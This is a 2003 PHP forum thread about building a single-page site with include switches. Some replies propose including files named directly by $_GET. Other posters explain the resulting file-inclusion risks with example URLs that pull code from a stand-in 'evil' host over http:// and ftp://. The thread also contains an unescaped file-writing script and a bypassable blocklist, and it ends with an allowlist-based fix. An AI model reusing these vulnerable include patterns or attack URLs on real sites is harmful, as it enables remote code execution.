Extending a single page management script
Posted: Mon Dec 15, 2003 8:16 pm
by Mobius Man
I've created a script (well, two different ones). The first one is for my index.php page, which is a simple include switch that keeps it to a single page design:
Code: Select all
<?php
ini_set('include_path', 'http://mobius_man.t35.com');
switch ($_GET['page']) {
    case 'articles':
        include('articles.php');
        break;
    case 'contact':
        include('contact.php');
        break;
    case 'spotlight':
        include('spotlight.php');
        break;
    case 'fan':
        include('fan.php');
        break;
    case 'multimedia':
        include('multimedia.php');
        break;
    case 'links':
        include('links.php');
        break;
    case null:
        include('./news/news.txt');
        break;
    default:
        include('error.php');
        break;
}
?>
That works fine. Secondly, I have a script that when I want to create pages for these pages (i.e. index -> articles -> page), it makes links on the selected page (articles.php for example). This is ok as well. The problem is, how can I include these links on the page as I do with the index.php and those branch files.
Basically I want the index ->articles.php ->page linked from articles.php to all be a single-page deal.
Posted: Mon Dec 15, 2003 8:35 pm
by McGruff
First, dynamic includes might be a better option than a switch / case - can be much quicker with many cases. You'd need to prefix file names for security if you are opening files based on values passed via GET:
Code: Select all
<?php
include('prefix_' . $_GET['page']);
?>
With the null & default cases:
Code: Select all
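<?php
function loadPage()
{
    // No page requested: include the default page here, then stop.
    if (!isset($_GET['page']))
    {
        // include .. etc
        return;
    }
    // Requested file does not exist: include the error page here, then stop.
    if (!is_file('prefix_' . $_GET['page']))
    {
        // include .. etc
        return;
    }
    include('prefix_' . $_GET['page']);
}
?>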
This requires strict file naming conventions, of course.
I couldn't quite understand your query: are you making a front controller? Some recent discussion on this here
viewtopic.php?t=15107
Posted: Mon Dec 15, 2003 8:44 pm
by Mobius Man
Basically I'm trying to make a basic manager using flat files (I have no access to SQL).
This is the file that makes the links, and writes the information to the pages:
Code: Select all
<?php
include ("news/config.php");
$id = $_POST["id"];
$filename = $_POST["id"];
$date = date("F j, Y");
$name = $_POST["name"];
$email = $_POST["email"];
$title = $_POST["title"];
$content = $_POST["content"];
$pass = $_POST["password"];
if ($password == $pass)
{
$dir = "/" ;
opendir($dir);
$filename2 = 'articles.php';
$file = file_get_contents($filename2);
$fp = fopen($filename2, "w");
fwrite($fp, "<a href=articles/$id>$title</a> - $date <br /><br />");
fwrite($fp, $file);
fclose($fp);
closedir($dir);
chdir("articles");
$file = file_get_contents($filename);
$fp = fopen($filename, "w");
fwrite($fp, "<h1>$title</h1> Posted by: <a href=mailto:$email>$name</a> $date <br /><br /><br /><br /> $content</font> <br />");
fwrite($fp, $file);
fclose($fp);
?>
<html>
<head>
<title> Page Editor</title>
</head>
<body bgcolor="#6B859C">
<?php echo "<font face=$font size=$fontsize>";
echo "<center><h2>SUCCESS!!</h2></center>";
echo "<center>Your news has been successfully posted.<br />";
echo "Go To: <a href=$websiteurl>$websitename</a> | <a href=page_create.php>Make Another Post</a></center></font>";
?>
</body>
</html>
<?php }
else {
echo "Wrong Password <a href=news.php>Try again</a>.";
}
?>
Posted: Tue Dec 16, 2003 3:07 pm
by basdog22
instead of:
Code: Select all
<?php
ini_set('include_path', 'http://mobius_man.t35.com');
switch ($_GET['page']) {
case 'articles':
include('articles.php');
break;
case 'contact':
include('contact.php');
break;
case 'spotlight':
include('spotlight.php');
break;
case 'fan':
include('fan.php');
break;
case 'multimedia':
include('multimedia.php');
break;
case 'links':
include('links.php');
break;
case null:
include('./news/news.txt');
break;
default:
include('error.php');
break;
}
?>
Do this:
Code: Select all
$file = $_GET['page'];
include "$file.php";
easier and safer.... I hope

Posted: Tue Dec 16, 2003 6:04 pm
by DuFF
basdog22 wrote:
easier and safer.... I hope

Easier, but not safer. Anyone could just use the URL query to bring up any PHP file in the directory. Example:
http://mobius_man.t35.com/index.php?page=path/to/secret.php
Mobius Man, could you please explain what your problem is in more detail? I don't understand what you are having problems with.
Posted: Tue Dec 16, 2003 6:24 pm
by qads
you want to edit the files with php?

Posted: Wed Dec 17, 2003 12:42 am
by vigge89
you can use something like this:
Code: Select all
<?php
// Include content
if (isset($_GET['id'])) {
    $id = "".addslashes($_GET['id']).".php";
    if (file_exists($id)) {
        include ($id); // Include chosen page
    }
    else {
        include ("404.php"); // If the file requested does not exist
    }
}
else {
    include ("start.php"); // Default page
}
?>
Posted: Wed Dec 17, 2003 2:54 pm
by basdog22
Anyone could just use the URL query to bring up any PHP file in the directory
this can be handled with: sessions, referer trick etc

Posted: Wed Dec 17, 2003 5:24 pm
by Weirdan
DuFF wrote:basdog22 wrote:
easier and safer.... I hope

Easier, but not safer. Anyone could just use the URL query to bring up any PHP file in the directory.
Even more, it could be used to include the script from a remote host:
Code: Select all
http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
It will include (and execute) the script from http://evil.weirdan's.host.com/path/to/secret.php.
Posted: Thu Dec 18, 2003 12:38 am
by basdog22
http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
Never thought of that. thanks weirdan
but again:
Code: Select all
<?php
if (eregi("http://",$page))
{
echo "I don't like you!!!";
}
...
..
?>
wouldn't do the trick?
Posted: Thu Dec 18, 2003 2:34 am
by m3mn0n
lol There is nothing wrong with what he uses, I use the exact same thing. And on most servers I've tested the different page switchers, the difference in script execution is not even a hundredth of a second; so no biggie. And I prefer to define what pages are able to be called instead of allowing anything within a directory, based on the file name. Maybe he does too.
Regarding your article manager, what is wrong with what you're trying to do? And how can we help?
Posted: Thu Dec 18, 2003 3:14 pm
by Weirdan
basdog22 wrote:http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
Never thought of that. thanks weirdan
but again:
Code: Select all
<?php
if (eregi("http://",$page))
{
echo "I don't like you!!!";
}
...
..
?>
wouldn't do the trick?
it will. But then I'll change the url to:
Code: Select all
http://mobius_man.t35.com/index.php?page=ftp://evil.weirdan's.host.com/path/to/secret

use the basename function to get rid of traversals and XSS attacks.
Posted: Thu Dec 18, 2003 3:38 pm
by Mobius Man
Wow! There's been a lot of posts since I was last on.
Basically, my problem is this. I want to include pages branching from a page off of index.php
For example:
index.php -> articles.php --- this works fine. However...
index.php -> articles.php -> a linked page from articles.php --- instead of being included on the same page as articles.php, it goes directly to the file. I want everything to stay as it would in index.php.
Posted: Fri Dec 19, 2003 8:07 am
by m3mn0n
?p=articles which requires articles.php; and within articles.php, you require an article be called from the GET method also. So the URL would be something like ?p=articles&id=2925.
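Added example (not code from any poster in this thread): one way to combine the fixed page list from the original switch, the basename suggestion above, and the ?p=articles&id=... scheme, so that neither parameter can reach include as a raw path or URL. The function name resolve_include, the articles/ directory layout and the digits-only article ids are assumptions made for this sketch.

```php
<?php
// Added example, not code from the thread. Page names come from the original
// switch; the articles/ layout and numeric article ids are assumptions.
const PAGES = ['articles', 'contact', 'spotlight', 'fan', 'multimedia', 'links'];

// Map ?p=<page>&id=<article> to a file under $baseDir, or to error.php.
// Nothing from the query string is concatenated into a path unchecked.
function resolve_include(array $query, string $baseDir): string
{
    $page = $query['p'] ?? null;
    if ($page === null) {
        return $baseDir . '/news/news.txt';       // default view
    }
    // Allowlist: a URL, a wrapper (http://, ftp://) or ../ can never match.
    if (!is_string($page) || !in_array($page, PAGES, true)) {
        return $baseDir . '/error.php';
    }
    if ($page !== 'articles' || !isset($query['id'])) {
        return $baseDir . '/' . $page . '.php';
    }
    // Second level: the article id must be digits only.
    $id = $query['id'];
    if (!is_string($id) || !ctype_digit($id)) {
        return $baseDir . '/error.php';
    }
    // basename() is defence in depth; realpath() confirms the file exists
    // and still sits inside articles/ once symlinks are resolved.
    $root = realpath($baseDir . '/articles');
    $file = realpath($baseDir . '/articles/' . basename($id) . '.php');
    if ($root === false || $file === false
        || strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return $baseDir . '/error.php';
    }
    return $file;
}

// Constructed sample requests, including the values quoted in the thread.
$samples = [
    [],
    ['p' => 'articles'],
    ['p' => 'articles', 'id' => '2925'],
    ['p' => 'articles', 'id' => '../index'],
    ['p' => 'path/to/secret'],
    ['p' => "ftp://evil.weirdan's.host.com/path/to/secret"],
];
foreach ($samples as $q) {
    echo json_encode($q), ' => ', resolve_include($q, __DIR__), "\n";
}
```

In index.php the call would be `include resolve_include($_GET, __DIR__);`, and links written into articles.php would point at `index.php?p=articles&id=...` rather than at the article file itself.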
Posted: Fri Dec 19, 2003 2:46 pm
by basdog22
weirdan
Thanks

basename rules
i will use it for another script i am working on. you can really play with this one
